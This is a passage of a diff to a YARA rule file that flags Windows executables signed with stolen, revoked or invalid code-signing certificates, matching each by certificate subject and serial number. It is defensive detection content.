+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_12705Fb66Bc22C68372A1C4E5Fa662E2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2A52Acb34Bd075Ac9F58771D2A4Bbfba : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c9604f76-ad8a-5ac0-ba12-5030b12bedbf"
+		id = "2d6b6ff5-e081-5e91-b03f-6e0d02afdb8f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7601-L7613"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2235-L2246"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a212e491ce661dec5512f82eed42b1863afb75ce7fb185c41af178f3852b78c8"
+		logic_hash = "9ffad34a94e9210bb98021c0ee0ddba4144406cca976537efe24e63367a295cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "288959bd1e8dd12f773e9601dc21c57678769909"
-		hash1 = "151b1495d6d1c68e32cdba36d6d3e1d40c8c0d3c12e9e5bd566f1ee742b81b4e"
+		thumbprint = "c839065a159bec7e63bfdcb1794889829853c07f7a931666f4eb84103302c1c9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Katarzyna Galganek mim e coc" and pe.signatures [ i ] . serial == "2a:52:ac:b3:4b:d0:75:ac:9f:58:77:1d:2a:4b:bf:ba" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_205483936F360924E8D2A4Eb6D3A9F31 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5A9D897077A22Afe7Ad4C4A01Df6C418 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5cce232b-4dfc-5931-a4ea-2e3df5616026"
+		id = "e44fcc54-9d0c-5b9b-a34a-03f31ae5333d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7615-L7627"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2248-L2259"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "09bf63b88eda95aae094cecb868838f08b88a6b4fe2993145e20293034c12863"
+		logic_hash = "f82b59f5d1996ae37b0cb7f7a799e2fcc7d9da0ffddfe63cbbb84b6f0e7e7b23"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "430dbeff2f6df708b03354d5d07e78400cfed8e9"
-		hash1 = "e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e"
+		thumbprint = "50fa9d22557354a078767cb61f93de9abe491e3a8cb69c280796c7c20eabd5b9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURN CONSULTANCY LTD" and pe.signatures [ i ] . serial == "20:54:83:93:6f:36:09:24:e8:d2:a4:eb:6d:3a:9f:31" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klarens LLC" and pe.signatures [ i ] . serial == "5a:9d:89:70:77:a2:2a:fe:7a:d4:c4:a0:1d:f6:c4:18" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_06Bcb74291D96096577Bdb1E165Dce85 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00D7C432E8D4Edef515Bfb9D1C214Ff0F5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e7c24edc-2e59-5ee1-ad2f-d260b4014fdd"
+		id = "fc3fd388-91f6-5f53-a284-4ef0a7d22290"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7629-L7641"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2261-L2272"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34f533f7c7e12aaac9a1998654fae6ffde366affa90e9cba061b356fa7190e71"
+		logic_hash = "9ef64774a0b6b11820321cd36d49213ad245cea82960aab99bb18e44a2ee79a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d1bde6303266977f7540221543d3f2625da24ac4"
-		hash1 = "074cef597dc028b08dc2fe927ea60f09cfd5e19f928f2e4071860b9a159b365d"
+		thumbprint = "6256d3ca79330f7bd912a88e59f9a4f3bdebdcd6b9c55cda4e733e26583b3d61"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0D261C8470Adbb65800Ceaf3Eac70819 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0085E1Af2Be0F380E5A5D11513Ddf45Fc6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0304b3ae-6a3c-5831-a749-76432b3356b4"
+		id = "d55fd5ca-0e20-51de-84b6-f30dd2660529"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7643-L7655"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2274-L2285"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e71f5d24500ac202aad5a439aa0d5f1bf7e6259c1d7e11bb40c7b9ae93bd86c0"
+		logic_hash = "5a86b9aecf7697bd8e1f40407934c6a9941714404a931b0f1bed4ae7440f6921"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "307ef8a02a0fc9032591c624624fa3531c235aa1"
-		hash1 = "050dbd816c222d3c012ba9f2b1308db8e160e7d891f231272f1eacf19d0a0a06"
+		thumbprint = "e9849101535b47ff2a67e4897113c06f024d33f575baa5b426352f15116b98b4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company Corp." and pe.signatures [ i ] . serial == "0d:26:1c:84:70:ad:bb:65:80:0c:ea:f3:ea:c7:08:19" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Makke Digital Works" and pe.signatures [ i ] . serial == "00:85:e1:af:2b:e0:f3:80:e5:a5:d1:15:13:dd:f4:5f:c6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_40E27B7404Aa9B485F8A2Fc0C8E53Af3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_02Aa497D39320Fc979Ad96160D90D410 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1aee45e6-ff0b-56a6-a50e-284bf2122e3b"
+		id = "9387010e-94f5-5787-b30f-609d98c48ddf"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7657-L7668"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2287-L2298"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "95a0bcf9b52ba8f4b63453abf0ee28027689450557a2408c6b27f8aafcbbe945"
+		logic_hash = "762b1730c8cfcf5a89e49858723d5701c1fb958eb2cd4da5b240f21763cdabf8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ca468ff8403a8416042705e79dbc499a5ea9be85"
+		thumbprint = "33e8e72a75d6f424c5a10d2b771254c07a7d9c138e5fea703117fe60951427ae"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Southern Wall Systems, LLC" and pe.signatures [ i ] . serial == "40:e2:7b:74:04:aa:9b:48:5f:8a:2f:c0:c8:e5:3a:f3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCHLESS GIFTS, INC." and pe.signatures [ i ] . serial == "02:aa:49:7d:39:32:0f:c9:79:ad:96:16:0d:90:d4:10" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_627Dfdf73A1455De5143A270799E6B7B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_D0B094274C761F367A8Eaea08E1D9C8F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7d5f0279-9498-5713-9c02-a025268d108f"
+		id = "3683b66b-3dc0-5b89-be71-1e1267ef7de8"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7670-L7681"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2300-L2311"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "833e772e56e87f730ee1acb9d6ed747d239903cfd9470d777efab73c5d656f49"
+		logic_hash = "5ce9be0bdd8350dd5a8ae8cf2447d1be6b34ee3abc5c19754c63ef03b7cccec9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7b69ff55d3c39bd7d67a10f341c1443425f0c83f"
+		thumbprint = "e94a9d81c4a67ef953fdb27aad6ec8fa347e6903b140d21468066bdca8925bc5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai liancheng Technology Co., Ltd." and pe.signatures [ i ] . serial == "62:7d:fd:f7:3a:14:55:de:51:43:a2:70:79:9e:6b:7b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nsasoft US LLC" and pe.signatures [ i ] . serial == "d0:b0:94:27:4c:76:1f:36:7a:8e:ae:a0:8e:1d:9c:8f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1966Bc76Bda1A708334792Da9A336F69 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00D59A05955A4A421500F9561Ce983Aac4 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "254ccdb7-df1c-560a-af68-123ea66c3463"
+		id = "97c4e8fa-8d66-500f-a63f-fac84ad9e508"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7683-L7694"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2313-L2324"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d0293e76f8a595d769fd302829bd94a576d647bbacb586728e804bf4dce1af78"
+		logic_hash = "9187dcdbf29e5119d90ede266a14c7e46f5050800a38c57fa86e957c885c1d60"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "29fec27c36efc6809c7269f76cf86ee18cc6ed87"
+		thumbprint = "7f56555ac8479d4e130a89e787b7ff2f47005cc02776cf7a30a58611748c4c2e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SYNTHETIC LABS LIMITED" and pe.signatures [ i ] . serial == "19:66:bc:76:bd:a1:a7:08:33:47:92:da:9a:33:6f:69" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_82D224323Efa65060B641F51Fadfef02 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_35590Ebe4A02Dc23317D8Ce47A947A9B : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2c0b0e6d-2c82-506b-88ea-a6d49f0f64a6"
+		id = "36630916-26df-5d2c-8faf-9fa2e240bff3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7696-L7710"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2326-L2337"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ed849dfd905e01145274d41b3bbb2c0265b099e540ac17909b6ed59f006e245"
+		logic_hash = "c01f9ecb1e69f6d0cb8061930cda27469eb18be19c0471192b31d516cddf828f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8dccf6ad21a58226521e36d7e5dbad133331c181"
+		thumbprint = "d9b60a67cf3c8964be1e691d22b97932d40437bfead97a84c1350a2c57914f28"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Be2F22C152Bb218B898C4029056816A9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1F23F001458716D435Cca1A55D660Ec5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "50c0cee3-39d5-5c57-9515-11356f8cab93"
+		id = "16a904e4-bf1a-5530-9269-d92c0f1bb4d3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7712-L7726"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2339-L2350"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9eba1585d92b184afb7b75b84e0010539ac42ca27e4d5d8bccee6b01e3471cca"
+		logic_hash = "3e91429f7b25ad54103ee230a36d4b51060adb458b533b9cbd00178a02676629"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "85fe11e799609306516d82e026d4baef4c1e9ad3"
+		thumbprint = "934d9357b6fb96f7fb8c461dd86824b3eed5f44a65c10383fe0be742c8c9b60e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marts GmbH" and ( pe.signatures [ i ] . serial == "be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" or pe.signatures [ i ] . serial == "00:be:2f:22:c1:52:bb:21:8b:89:8c:40:29:05:68:16:a9" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_29E8E993D2406454B6B18Cb377471Bc6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C2Fc83D458E653837Fcfc132C9B03062 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a80f015c-3793-52ac-a405-1a7fe2ca0caa"
+		id = "fbc9420d-4670-502f-af6a-13d17fb73938"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7728-L7739"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2352-L2363"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf248e664d00675d3fc87070b6358ca7539ef6e748b8bfafcba7ecb91cb1ea05"
+		logic_hash = "96ed5e78195f12cdc0316ed454ad4e2235253ed897905c4a97756b306933d874"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0fb38235366b0ba534a6f81c02d9a67555235e07"
+		thumbprint = "82294a7efa5208eb2344db420b9aeff317337a073c1a6b41b39dda549a94557e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MONDIAL MONTERO SP Z O O" and pe.signatures [ i ] . serial == "29:e8:e9:93:d2:40:64:54:b6:b1:8c:b3:77:47:1b:c6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6Daa67498C3A5D8133F28Fefe9Ccc20E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Fcb3D3519E66E5B6D90B8B595F558E81 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5eb899b3-347d-5e74-8afa-29ffa73c7231"
+		id = "966650b5-d776-5ed0-a99b-507b46abd882"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7741-L7754"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2365-L2376"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc66a18e4f8d14f98e5a8073d32b641e0eb795e989fb62ac23207e765838561a"
+		logic_hash = "62c7189cc906b9f2d2724492489218d9aecf08ef431463ebf1963b034222f2ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f54146fadad277f67b14cfebd13cbada9789281cee7165db0277ad51621adb97"
-		reason = "ParallaxRAT"
+		thumbprint = "8bf6e51dfe209a2ca87da4c6b61d1e9a92e336e1a83372d7a568132af3ad0196"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rimsara Development OU" and pe.signatures [ i ] . serial == "6d:aa:67:49:8c:3a:5d:81:33:f2:8f:ef:e9:cc:c2:0e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pegasun" and pe.signatures [ i ] . serial == "fc:b3:d3:51:9e:66:e5:b6:d9:0b:8b:59:5f:55:8e:81" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_59F296D0Af649E0962D724248D9Fdcdb : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4B03Cabe6A0481F17A2Dbeb9Aefad425 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c9423cae-07a7-5ecb-966d-b1636563934a"
+		id = "3995296a-58ce-5615-8524-525698af3537"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7756-L7769"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2378-L2389"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0212033b2ea12f568a3c2e4d3768194c8035c6b6ebf054af90fe82ffcd7e6a5b"
+		logic_hash = "e3c0d68a65bc53b83a48310857605afda0004b4122201c18a66fea085a210924"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ce2aa31a714cc05f86d726a959f6655efc40777aa474fb6b9689154fdc918a44"
-		reason = "DarkGate"
+		thumbprint = "2e86cb95aa7e4c1f396e236b41bb184787274bb286909b60790b98f713b58777"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MK ZN s.r.o." and pe.signatures [ i ] . serial == "59:f2:96:d0:af:64:9e:09:62:d7:24:24:8d:9f:dc:db" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_A32F3Ba229704Ad400473F7479E4C3E4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_539015999E304A5952985A994F9C3A53 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "28d687bc-e67c-51d1-82af-53255ee44a8d"
+		id = "b53f5843-fb4c-5c61-be24-21bdbc445239"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7771-L7784"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2391-L2402"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9c7b9b6827e10a8c2a6d771d14068a074104683fe75f24dea85c5bf3f3bc04db"
+		logic_hash = "72304761de1d5e81659487947a1cfa017f7f41d5639f18634db4dfd094980518"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ab4b30913895d8df383fdadebc29d2e04a5c854bc4172c0d41bcbef176e8f37e"
-		reason = "RecordBreaker"
+		thumbprint = "7731825aea38cfc77ba039a74417dd211abef2e16094072d8c2384af1093f575"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOTUL SOLUTIONS LIMITED" and pe.signatures [ i ] . serial == "a3:2f:3b:a2:29:70:4a:d4:00:47:3f:74:79:e4:c3:e4" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3Ab74A2Ebf93447Adb83554B5564Fe03 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_016836311Fc39Fbb8E6F308Bb03Cc2B3 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1b0be137-ddcf-5215-9cb0-d687d7b6ca6c"
+		id = "06cc9c38-c5a6-5311-8ceb-943ea3993fc7"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7786-L7799"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2404-L2415"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8dbc549ecaf1cb3f07486bac7ed265882af4b6b29b9772736118490eb9233303"
+		logic_hash = "912d490ac5d746c584e4dd5639be98d9577faba215cc1f8ebdf360581be53d5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8ed289fcc40bbc150a52b733123f6094ccfb2c499d6e932b0d9a6001490fb7e6"
-		reason = "RedLineStealer"
+		thumbprint = "cab373e2d4672beacf4ca9c9baf75a2182a106cca5ea32f2fc2295848771a979"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMPERIOUS TECHNOLOGIES LIMITED" and pe.signatures [ i ] . serial == "3a:b7:4a:2e:bf:93:44:7a:db:83:55:4b:55:64:fe:03" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SERVICE STREAM LIMITED" and pe.signatures [ i ] . serial == "01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_90212473C706F523Fe84Bdb9A78A01F4 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_009Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f195cf1e-4e01-51ec-ae12-21ff56dd58e2"
